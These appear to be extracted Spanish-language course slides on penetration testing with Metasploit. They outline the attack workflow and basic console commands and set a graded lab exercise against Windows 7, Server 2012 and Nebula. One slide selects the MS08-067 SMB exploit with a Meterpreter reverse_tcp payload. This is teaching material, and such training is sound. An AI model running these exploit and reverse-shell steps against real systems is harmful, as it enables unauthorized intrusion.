5. Docente: Alan G.
Escaneo de
Vulnerabilidades
Identificación de
CVE
Identificación de
Exploits
Ejecución de
Exploits
Acceso
Metasploit
6. Docente: Alan G.
ü Compatible con los principales S.O.
ü Backtrack – Kali Linux posee dicha herramienta
instalada por defecto.
ü El comando msfconsole permite acceder a esta desde
consola.
Acceso
Metasploit
7. Docente: Alan G.
ü Con el comando msfupdate se actualizará la base de
datos en cuanto a exploits y payloads se refiere.
ü El comando use se utilizará para llamar un exploit.
ü El comando set se utilizará para llamar un payload.
Acceso
Metasploit
8. Docente: Alan G.
ü LHOST lo cual resulta ser la IP del equipo atacante,
ejecutándose con el comando set LHOST x.x.x.x.
ü RHOST lo cual resulta ser la IP del equipo víctima,
ejecutándose con el comando set RHOST x.x.x.x.
ü LPORT lo cual indica el puerto del equipo atacante
desde el cual se establecerá la conexión.
ü RPORT lo cual indica el puerto del equipo víctima con
el cual se establecerá la conexión.
Acceso
Metasploit
9. Docente: Alan G.
Acceso
Metasploit
• Una vez utilizado openvas:
root@kali:~# use windows/smb/ms08_067_netapi
root@kali:~# set payload windows/meterpreter/
reverse_tcp
10. Docente: Alan G.
ACTIVIDAD FINAL
Video de acceso a:
• Windows 7
• Win Server 2012
• Pentest exploit-excercises – Nebula
Realizar primeros 4 Niveles
ü https://exploit-exercises.com/nebula/
ü https://www.youtube.com/watch?
v=UDF9VWc4NBQ
11. Docente: Alan G.
ACTIVIDAD FINAL
Entregables
• Video explicativo para cada uno de los
casos.
• Informe formato IEEE
12. Docente: Alan G.
ACTIVIDAD FINAL
Valoración
Tema Video Informe Total
Win 7 60% 40% 25%
Win Server 60% 40% 25%
Nebula 60% 40% 50%